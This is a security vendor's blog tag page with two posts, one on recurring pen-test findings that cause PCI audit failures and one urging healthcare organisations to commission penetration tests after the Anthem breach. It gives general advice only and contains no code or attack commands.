Skip to main content
search
Tag

penetration testing

May 22
Love172

3 Key Reasons You’ll Fail Your PCI Audit

By Blog No Comments

I am always astonished at the common recurring themes that expert penetration testers uncover during routine testing for requirement 11.3 of the PCI DSS. Since misery loves company I will assuage your pain by pointing out you’re not alone – I’ve seen these same issues for a decade now.

“Your database is in the DMZ isn’t it?” to which he sheepishly replied, “Yes!”

Here are those common reasons:

  1. I can pull down your entire database of key information.
  2. You’re still sending clear text passwords in your application.
  3. Your web application is fraught with XSS vulnerabilities.

Your Database

Yesterday I was speaking with a fellow at a business trade show. He lamented about how his business had recently been hacked, and all of his customer data had been altered such that all his customer addresses now show Ontario, Canada. I said, “Your database is in the DMZ isn’t it?” to which he sheepishly replied, “Yes!”

That is a simple example of ignorance, but more sophisticated organizations – those who process card data, for example, and even those with multiple POS systems and central data relays – have been known to display a more sophisticated (though no less forgivable) ignorance.

One such organization did have their database in a secure zone, but due to blind SQL vulnerabilities, the penetration tester was just one command short of downloading their entire database structure and data.

Another organization had no password on several logins, and as above, the tester was able to potentially download the entire database. In fairness, that scenario was on an internal white box test, but no less ignorance of the facts regarding the issue.

Clear Text Passwords

Organizations build and run applications. Some are public facing, others have internal access only. Either way, equally astounding is the fact that password schemas often pass such in clear text instead of using cryptography. This is every hacker’s dream, giving him access to data, systems or worse – root access.

I am always floored when a major SAaS company is discovered to be running clear text passwords in parts or all of its application(s). Many a company has been compromised due to this issue.

Cross Site Scripting

Web server applications that generate pages dynamically are vulnerable to a cross-site scripting exploit if they fail to validate user input and to ensure that pages generated are encoded properly. An example of this is en exploit that creates a link to a page that looks proper but sends the user to a phishing page to steal credentials.

This is always do to insecure application coding with a failure to properly validate the user input or handle error messages.

The point here is that I’ve seen this in many card processing organizations where the failure to fix this vulnerability could be disastrous.

Summary

Having pointed out recurring key issues, you may be saying, “Well I can see that in other companies but not in mine!” The problem is, sometimes when one vulnerability is fixed, others are introduced. So while you may have passed your point-in-time compliance audit last year, this year may be a different story.

It is instructive to point out the PCI requirement 11.3.1 which applies here: “Perform external penetration testing at least annually and after any significant infrastructure or application upgrade or modification.” Most companies simply don’t do this.

In summary, you don’t have to fail your PCI Audits every year – just test and fix before the auditor arrives (vs. waiting to test while your annual assessment is in progress), and during the ensuing year ensure that at least one additional pen test is conducted to avoid cascading accumulation of problems.

Feb 18
Love99

It’s Not About Target Anymore

By Blog No Comments

This article is a clarion call to the healthcare industry to wake up! It’s not about Target and Home Depot anymore. On February 5th, Anthem Inc., the largest for-profit managed health care company in the Blue Cross and Blue Shield Association, announced that 80 million records had been compromised.

It is interesting to note that this is not a unique occurrence. Just a week prior to the Anthem incident, a laptop was stolen from the Riverside County Regional Medical Center in Moreno Valley, California. The information on the laptop included names, phone numbers, addresses, dates of birth, Social Security Numbers, and clinical information such as medical record numbers, physicians, diagnosis, treatments received, medical departments and health insurance information.

To all of the State Governors, Hospital Administrators, and various CEOs of insurance and other healthcare-related entities reading this article, pay attention because herein lies the secret of knowing whether you are next. You must ask the question, “How hackable am I?” And you must fully expect to find out.
In the same month, other data breach incidents occurred at Sunglo Home Health Services of Harlingen, Texas, and California Pacific Medical Center/Sutter Health of San Francisco, California. It seems health data compromises from California to New York, and from Texas Health and Human Services to the Utah Department of Health have in recent years experienced a sharp uptick.

To all of the State Governors, Hospital Administrators, and various CEOs of insurance other healthcare-related entities reading this article, pay attention because herein lies the secret of knowing whether you are next. You must ask the question, “How hackable am I?” And you must fully expect to find out.

There is only one way to find out if you are hackable, and that is to hire a hacker to hack you. It sounds risky, but it is actually called penetration testing and is performed by reputable companies who employ credentialed individuals such as the Certified Ethical Hacker or CISSP credential.

You may say, “Well we have our own internal vulnerability team.” This is fantastic! As it should be. However these are your employees and are biased by the paycheck you sign every payday. I recommend that you hire an objective outside company at least annually to perform an in-depth internal and external penetration test on both your network, databases and critical applications.

Some standards, such as PCI, state that penetration tests by qualified outside parties should be performed annually or as often as there are changes to the environment. The point here is that such an event only applies to a point-in-time assessment and is invalidated if new technology is installed and configured incorrectly.

In summary, qualified engineers can find and report on the “hackability” of your systems, and provide a remediation report to ensure you don’t become the next Anthem. It’s not just about Target, Home Depot, or big box retailers anymore. Healthcare is now squarely on the hacker’s crosshairs.

About the Author

Greg Johnson is the VP of Security Business Development and Strategy at Lancera Security, the World’s Trusted Source of Security Solutions. Mr. Johnson is an entertaining and sought-after speaker in the world of cyber security.

Close Menu
MENU